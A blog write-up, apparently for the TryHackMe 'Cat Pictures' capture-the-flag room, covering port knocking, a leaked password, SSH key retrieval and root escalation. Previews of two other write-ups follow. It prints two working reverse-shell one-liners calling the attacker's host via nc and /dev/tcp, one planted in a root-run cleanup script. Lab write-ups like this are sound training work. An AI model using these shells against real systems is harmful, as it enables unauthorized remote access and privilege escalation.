Cat Pictures - TryHackMe

-
thm

Cat Pictures

I made a forum where you can post cute cat pictures!

Enumerations

Let’s run a nmap scan see what we got.

# Nmap 7.91 scan initiated Sat Jun  5 16:54:16 2021 as: nmap -sV -sC -oN nmap/scan 10.10.137.255
Nmap scan report for 10.10.137.255
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
8080/tcp open  ssl/http-proxy?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun  5 16:55:55 2021 -- 1 IP address (1 host up) scanned in 98.59 seconds

Looks like we got a website.

Let’s poke around little bit. After sometime I found some hint to what to do. It was in the Your first forum.

Let’s knock to the server. I use knock.py to knock the server. It’s a simple script from this repo :

https://github.com/grongor/knock

You can simply use this command to exectue the script.

./knock 10.10.64.47 1111 2222 3333 4444

Now we knock the ports. Let’s run nmap scan again see what comeback.

# Nmap 7.91 scan initiated Sun Jun  6 15:47:29 2021 as: nmap -sC -sV -A -oN nmap/after_the_knock 10.10.64.47
Nmap scan report for 10.10.64.47
Host is up (0.15s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp           162 Apr 02 14:32 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.2.48
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
8080/tcp open  http    Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun  6 15:48:02 2021 -- 1 IP address (1 host up) scanned in 33.45 seconds

We got a FTP server and inside it we got a note.txt . Let’s see what was that

In case I forget my password, I'm leaving a pointer to the internal shell service on the server.

Connect to port 4420, the password is *******.
- catlover

We got a password and port 4420. Let’s look into port 4420

┌─[][visith@parrot][~/CTF/thm/cat_pictures]
└──╼ $nc -v 10.10.64.47 4420
10.10.64.47: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.64.47] 4420 (?) open
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
******
Password accepted
ls
bin
etc
home
lib
lib64
opt
tmp
usr

We got a shell but they said we can’t use cd to look around. Now what we do !!

Thx to pentestmonkey we got a revshells.

This was my revshell :

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.2.48 4444 >/tmp/f

When we slap that badboy into that netcat shell and setup a netcat listener BOOM !!! we got a shell. Here we can use cd command.

┌─[][visith@parrot][~/CTF/thm/cat_pictures]
└──╼ $nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.9.2.48] from (UNKNOWN) [10.10.64.47] 55986
/bin/sh: 0: can't access tty; job control turned off
# /bin/bash -i
bash: cannot set terminal process group (1589): Inappropriate ioctl for device
bash: no job control in this shell
I have no name!@cat-pictures:/# ls -la
ls -la
total 56
drwxr-xr-x 10 1001 1001 4096 Apr  3 01:30 .
drwxr-xr-x 10 1001 1001 4096 Apr  3 01:30 ..
-rw-------  1 1001 1001   50 Apr  1 20:23 .bash_history
-rw-r--r--  1 1001 1001  220 Apr  1 20:21 .bash_logout
-rw-r--r--  1 1001 1001 3771 Apr  1 20:21 .bashrc
-rw-r--r--  1 1001 1001  807 Apr  1 20:21 .profile
drwxrwxr-x  2 1001 1001 4096 Apr  2 23:05 bin
drwxr-xr-x  2    0    0 4096 Apr  1 20:32 etc
drwxr-xr-x  3    0    0 4096 Apr  2 20:51 home
drwxr-xr-x  3    0    0 4096 Apr  2 22:53 lib
drwxr-xr-x  2    0    0 4096 Apr  1 20:28 lib64
drwxr-xr-x  2    0    0 4096 Apr  2 20:56 opt
drwxr-xr-x  2    0    0 4096 Jun  6 10:58 tmp
drwxr-xr-x  4    0    0 4096 Apr  2 22:43 usr
I have no name!@cat-pictures:/home# ls         
ls
catlover
I have no name!@cat-pictures:/home# cd catlover
cd catlover
I have no name!@cat-pictures:/home/catlover# ls -la
ls -la
total 28
drwxr-xr-x 2 0 0  4096 Apr  3 01:34 .
drwxr-xr-x 3 0 0  4096 Apr  2 20:51 ..
-rwxr-xr-x 1 0 0 18856 Apr  3 01:35 runme

When we look into that run me file we got some nonsence there. But among them my cat eyes caught this

rbeccaPlease enter your password: Welcome, catlover! SSH key transfer queued! touch /tmp/gibmethesshkeyAccess Deniedd

Maybe rebecca is the password. who knows we can try it.

 have no name!@cat-pictures:/home/catlover# ./runme
./runme
Please enter yout password: rebecca
Welcome, catlover! SSH key transfer queued! 
I have no name!@cat-pictures:/home/catlover# ls -la
ls -la
total 32
drwxr-xr-x 2 0 0  4096 Jun  6 11:06 .
drwxr-xr-x 3 0 0  4096 Apr  2 20:51 ..
-rw-r--r-- 1 0 0  1675 Jun  6 11:06 id_rsa
-rwxr-xr-x 1 0 0 18856 Apr  3 01:35 runme
I have no name!@cat-pictures:/home/catlover#

BOOM! rebecca was the password. We got a private key. If you not get it go back to previous dir and comeback and check it will be here.

Let’s change the permission for ssh key and connect to the ssh .

┌─[visith@parrot][~/CTF/thm/cat_pictures]
└──╼ $sudo chmod 600 id_rsa 
[sudo] password for visith: 
┌─[visith@parrot][~/CTF/thm/cat_pictures]
└──╼ $ssh catlover@10.10.64.47 -i id_rsa 
The authenticity of host '10.10.64.47 (10.10.64.47)' can't be established.
ECDSA key fingerprint is SHA256:7HBac/JH7EKQik9kL1l9GMjCgLN/69gfXalu5cbPi4U.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

root@7546fa2336d6:/# 
root@7546fa2336d6:/# ls
bin  boot  etc   lib    media  opt      post-init.sh  root  sbin  sys  usr
bitnami  dev   home  lib64  mnt    post-init.d  proc          run   srv   tmp  var
root@7546fa2336d6:/# cd root
root@7546fa2336d6:/root# ls
flag.txt
root@7546fa2336d6:/root# cat flag.txt
*******

After some waste of time I ran a linpeas script to make sure everything didn’t miss. There was a “/opt/clean” filesystem that was exactly the same as “overlay”.

Let's hope into the “/opt/clean” location, there was a “clean.sh” script in there. It cleaned the “/tmp” directory completely.

Let's try to execute a rev shell and setup a nc listener. This was my revshell :

echo "bash -i >& /dev/tcp/10.9.2.48/9999 0>&1" > clean.sh

We got a call back to our listener.

┌─[][visith@parrot][~/CTF/thm/cat_pictures]
└──╼ $nc -lnvp 9999
listening on [any] 9999 ...
connect to [10.9.2.48] from (UNKNOWN) [10.10.64.47] 51398
bash: cannot set terminal process group (2590): Inappropriate ioctl for device
bash: no job control in this shell
root@cat-pictures:~# ls
ls
firewall
root.txt
root@cat-pictures:~# cat root.txt
cat root.txt
Congrats!!!
Here is your flag:
******

Thx for reading !!

Popular posts from this blog

Mustacchio - TryHackMe

-
Image
thm What we can learn from this machine : XXE injection Enumerations SUID exploit let’s start with a nmap scan. normal nmap scan found port 80 webserver called Mustacchio and port 22 ssh open running ubuntu. I try to running a full nmap scan for see more ports are open above the port 1000. # Nmap 7.91 scan initiated Sat Jun 12 14:57:25 2021 as: nmap -sC -sV -p- -oN scans/nmap-allports 10.10.236.36 Nmap scan report for 10.10.236.36 Host is up (0.15s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA) | 256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA) |_ 256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-t
Read more

Tech_Supp0rt: 1 - TryHackMe

-
Image
Welcome file Welcome to another CTF-writeup !! Tech_support:1 by vikaran. What we can learn from this machine. nmap scan , smbmap etc. (enumeration skills) subrion cms 4.2.1 RCE iconv sudo permission to overwritten files and read the files Let’s start with enumeration. First with nmap to see what port we have in the box. Nmap scan ┌── ( defalt@kali ) - [ ~/Documents/tryhackme/Tech_Supp0rt:1 ] └─$ nmap -sC -sV 10.10.168.200 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-15 21:29 PDT Nmap scan report for 10.10.168.20 Host is up ( 0.37s latency ) . Not shown: 996 closed tcp ports ( conn-refused ) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 ( Ubuntu Linux ; protocol 2.0 ) | ssh-hostkey: | 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 ( RSA ) | 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c ( ECDSA ) | _ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c ( ED25519 ) 80/tcp open http Apache ht
Read more